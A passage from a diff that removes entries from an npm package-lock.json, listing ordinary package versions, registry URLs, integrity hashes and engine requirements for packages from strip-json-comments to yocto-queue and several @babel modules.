"https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", - "dependencies": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, - "engines": { - "node": ">=18" - } - }, - "node_modules/tar/node_modules/yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==", - "engines": { - "node": ">=18" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/text-table": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/text-table/-/text-table-0.2.0.tgz", - "integrity": "sha512-N+8UisAXDGk8PFXP4HAzVR9nbfmVJ3zYLAWiTIoqC5v5isinhr+r5uaO8+7r3BMfuNIufIsA7RdpVgacC2cSpw==", - "dev": true, - "peer": true - }, - "node_modules/throat": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/throat/-/throat-6.0.2.tgz", - "integrity": "sha512-WKexMoJj3vEuK0yFEapj8y64V0A6xcuPuK9Gt1d0R+dzCSJc0lHqQytAbSB4cDAK0dWh4T0E2ETkoLE2WZ41OQ==", - "dev": true - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" - }, - "node_modules/type-check": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.4.0.tgz", - "integrity": "sha512-XleUoc9uwGXqjWwXaUTZAmzMcFZ5858QA2vvx1Ur5xIcixXIP+8LnFDgRplU30us6teqdlskFfu+ae4K79Ooew==", - "dev": true, - "peer": true, - "dependencies": { - "prelude-ls": "^1.2.1" - }, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.20.2", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.20.2.tgz", - "integrity": "sha512-Ne+eE4r0/iWnpAxD852z3A+N0Bt5RN//NjJwRd2VFHEmrywxf5vsZlh4R6lixl6B+wz/8d+maTSAkN1FIkI3LQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/undici-types": { - "version": "6.20.0", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", - "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==", - "dev": true - }, - "node_modules/update-browserslist-db": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", - "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.2.0", - "picocolors": "^1.1.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.3.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", - "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrap-ansi-cjs": { - "name": "wrap-ansi", - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "engines": { - "node": ">=10.0.0" - }, - "peerDependencies": { - "bufferutil": "^4.0.1", - "utf-8-validate": ">=5.0.2" - }, - "peerDependenciesMeta": { - "bufferutil": { - "optional": true - }, - "utf-8-validate": { - "optional": true - } - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/yaml": { - "version": "1.10.2", - "resolved": "https://registry.npmjs.org/yaml/-/yaml-1.10.2.tgz", - "integrity": "sha512-r3vXyErRCYJ7wg28yvBY5VSoAF8ZvlcW9/BwUzEtUsjvX/DKs24dIkuwjtuprwJJHsbyUbLApepYTR1BN4uHrg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@aashutoshrathi/word-wrap": { - "version": "1.2.6", - "resolved": "https://registry.npmjs.org/@aashutoshrathi/word-wrap/-/word-wrap-1.2.6.tgz", - "integrity": "sha512-1Yjs2SvM8TflER/OD3cOjhWWOZb58A2t7wpE2S9XfBYTiIl+XFhQG2bjy4Pu1I+EAlCNUzRDYDdFwFYUKvXcIA==", - "dev": true, - "peer": true - }, - "@ampproject/remapping": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.3.0.tgz", - "integrity": "sha512-30iZtAPgz+LTIYoeivqYo853f02jBYSd5uGnGpkFV0M3xOt9aN73erkgYAmZU43x4VfqcnLxW9Kpg3R5LC4YYw==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.24" - } - }, - "@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.25.9", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - } - }, - "@babel/compat-data": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", - "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", - "dev": true - }, - "@babel/core": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", - "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.26.0", - "@babel/generator": "^7.26.0", - "@babel/helper-compilation-targets": "^7.25.9", - "@babel/helper-module-transforms": "^7.26.0", - "@babel/helpers": "^7.26.0", - "@babel/parser": "^7.26.0", - "@babel/template": "^7.25.9", - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.26.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - } - }, - "@babel/generator": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", - "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", - "dev": true, - "requires": { - "@babel/parser": "^7.26.2", - "@babel/types": "^7.26.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^3.0.2" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", - "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.25.9", - "@babel/helper-validator-option": "^7.25.9", - "browserslist": "^4.24.0", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - } - }, - "@babel/helper-module-imports": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", - "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", - "dev": true, - "requires": { - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.25.9" - } - }, - "@babel/helper-module-transforms": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", - "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", - "dev": true, - "requires": { - "@babel/helper-module-imports": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9", - "@babel/traverse": "^7.25.9" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", - "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", - "dev": true - }, - "@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", - "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.0.tgz", - "integrity": "sha512-tbhNuIxNcVb21pInl3ZSjksLCvgdZy9KwJ8brv993QtIVKJBBkYXz4q4ZbAv31GdnC+R90np23L5FbEBlthAEw==", - "dev": true, - "requires": { - "@babel/template": "^7.25.9", - "@babel/types": "^7.26.0" - } - }, - "@babel/parser": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.2.tgz", - "integrity": "sha512-DWMCZH9WA4Maitz2q21SRKHo9QXZxkDsbNZoVD62gusNtNBBqDg9i7uOhASfTfIGNzW+O+r7+jAlM8dwphcJKQ==", - "dev": true, - "requires": { - "@babel/types": "^7.26.0" - } - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-class-static-block": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-static-block/-/plugin-syntax-class-static-block-7.14.5.tgz", - "integrity": "sha512-b+YyPmr6ldyNnM6sqYeMWE+bgJcJpO6yS4QD7ymxgH34GBPNDM/THBh8iunyvKIZztiwLH4CJZ0RxTk9emgpjw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-import-attributes": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-attributes/-/plugin-syntax-import-attributes-7.26.0.tgz", - "integrity": "sha512-e2dttdsJ1ZTpi3B9UYGLw41hifAubg19AtCu/2I/F1QNVclOBr1dYpTdmdyZ84Xiz43BS/tCUkMAZNLv12Pi+A==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", - "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-private-property-in-object": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-private-property-in-object/-/plugin-syntax-private-property-in-object-7.14.5.tgz", - "integrity": "sha512-0wVnp9dxJ72ZUJDV27ZfbSj6iHLoytYZmh3rFcxNnvsJF3ktkzLDZPy/mA17HGsaQT3/DQsWYX1f1QGWkCoVUg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": 